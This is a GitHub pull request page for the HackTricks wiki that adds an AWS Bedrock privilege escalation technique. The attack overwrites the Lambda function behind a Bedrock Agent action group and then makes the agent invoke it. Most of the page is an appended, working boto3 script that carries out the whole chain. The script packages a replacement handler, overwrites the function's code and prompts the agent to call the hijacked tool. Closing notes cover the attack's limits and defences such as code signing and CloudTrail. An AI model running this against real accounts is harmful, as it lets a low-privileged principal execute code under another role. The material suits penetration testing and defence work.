AWS Bedrock: Add Lambda Tool Hijacking Privilege Escalation (Agent Action Groups)#281

Merged
carlospolop merged 2 commits into HackTricks-wiki:master from jFriedli:arte-jfriedli-aws-bedrock-lambda-privesc
Apr 21, 2026
Conversation

@jFriedli

Summary

Adds a new AWS Bedrock privilege escalation technique based on Lambda-backed agent tool hijacking.

Details

This PR introduces a misconfiguration scenario where a principal with:

  • lambda:UpdateFunctionCode
  • bedrock:InvokeAgent

can modify a Lambda function used by a Bedrock Agent action group and trigger its execution via the agent.

Relation to Existing Content

This complements the existing Bedrock privilege escalation technique:

  • Code Interpreter Execution-Role Pivot (bedrock-agentcore:StartCodeInterpreterSession + bedrock-agentcore:InvokeCodeInterpreter)

While the existing technique focuses on AgentCore Code Interpreter execution roles, this PR introduces a separate attack surface:

  • Bedrock Agents + Lambda action groups
  • cross-service trust abuse (Bedrock → Lambda)

No existing content currently documents this vector.

Additional Changes

  • Fixed minor markdown formatting issue in the existing markdown (```` instead of ```).

References / Creds
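
The chain described in this PR's summary, written out as an added boto3 example (this is not code from the PR, from HackTricks, or from AWS). It assumes the attacker already knows the action group's Lambda function name and the agent ID and alias ID, that the function is a Python function whose handler is `lambda_function.lambda_handler`, and that the action group executor points at `$LATEST` rather than a pinned version. The `PAYLOAD_SOURCE` handler and the target names in `__main__` are constructed placeholders.

```python
"""Lambda tool hijacking against a Bedrock Agent action group (added example)."""
import io
import time
import uuid
import zipfile

# Constructed payload: a replacement Lambda handler. It runs under the function's
# execution role, so the identity it reports is the role the agent's tool uses,
# not the identity of the caller of bedrock:InvokeAgent. It answers in the two
# response shapes a Bedrock action group Lambda can be asked for (assumed here).
PAYLOAD_SOURCE = r'''
import json
import boto3

def lambda_handler(event, context):
    ident = boto3.client("sts").get_caller_identity()
    body = json.dumps({"arn": ident["Arn"], "account": ident["Account"]})
    if "apiPath" in event:
        # Action group defined by an OpenAPI schema.
        return {"messageVersion": "1.0", "response": {
            "actionGroup": event["actionGroup"], "apiPath": event["apiPath"],
            "httpMethod": event["httpMethod"], "httpStatusCode": 200,
            "responseBody": {"application/json": {"body": body}}}}
    # Action group defined by function details.
    return {"messageVersion": "1.0", "response": {
        "actionGroup": event["actionGroup"], "function": event["function"],
        "functionResponse": {"responseBody": {"TEXT": {"body": body}}}}}
'''


def build_deployment_zip(source: str, module_name: str) -> bytes:
    """Package `source` as <module_name>.py, the layout Lambda expects for a
    Python handler configured as <module_name>.lambda_handler."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{module_name}.py", source)
    return buf.getvalue()


def collect_completion(event_stream) -> str:
    """Concatenate the text chunks of an InvokeAgent completion stream,
    skipping trace and other non-chunk events."""
    parts = []
    for event in event_stream:
        chunk = event.get("chunk")
        if chunk and "bytes" in chunk:
            parts.append(chunk["bytes"].decode("utf-8"))
    return "".join(parts)


def hijack_action_group_lambda(lambda_client, agent_runtime, function_name,
                               agent_id, agent_alias_id, prompt,
                               handler_module="lambda_function", settle_seconds=10):
    """1) overwrite the action group's Lambda code (lambda:UpdateFunctionCode),
    2) make the agent call the tool (bedrock:InvokeAgent),
    3) return what the agent relayed from the hijacked tool."""
    zip_bytes = build_deployment_zip(PAYLOAD_SOURCE, handler_module)
    update = lambda_client.update_function_code(
        FunctionName=function_name, ZipFile=zip_bytes, Publish=False)
    # UpdateFunctionCode is asynchronous; invocations during the update still
    # run the old code. Polling LastUpdateStatus needs GetFunctionConfiguration,
    # which the assumed permission set lacks, so just wait.
    time.sleep(settle_seconds)
    session_id = str(uuid.uuid4())
    response = agent_runtime.invoke_agent(
        agentId=agent_id, agentAliasId=agent_alias_id,
        sessionId=session_id, inputText=prompt)
    return {
        "function_arn": update.get("FunctionArn"),
        "session_id": session_id,
        "completion": collect_completion(response["completion"]),
    }


if __name__ == "__main__":
    import boto3  # real clients; the target names below are placeholders
    result = hijack_action_group_lambda(
        boto3.client("lambda"), boto3.client("bedrock-agent-runtime"),
        function_name="agent-tool-fn", agent_id="AGENTID1234",
        agent_alias_id="ALIASID123",
        prompt="Use your tool and repeat exactly what it returned.")
    print(result["completion"])
```

Two practical limits of this permission set: `lambda:UpdateFunctionCode` cannot change the function's handler or runtime, so the replacement module name (and language) must match the existing configuration, and the update is ineffective if the action group executor ARN references a published version or an alias pinned to one. The prompt also has to make the agent choose the tool; it will not run the Lambda for an unrelated question. On the defensive side, a Lambda code signing configuration set to enforce rejects unsigned `ZipFile` updates like this one, and CloudTrail shows the UpdateFunctionCode call by the low-privileged principal shortly before the agent invocation.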

@carlospolop carlospolop merged commit c7d8d96 into HackTricks-wiki:master Apr 21, 2026
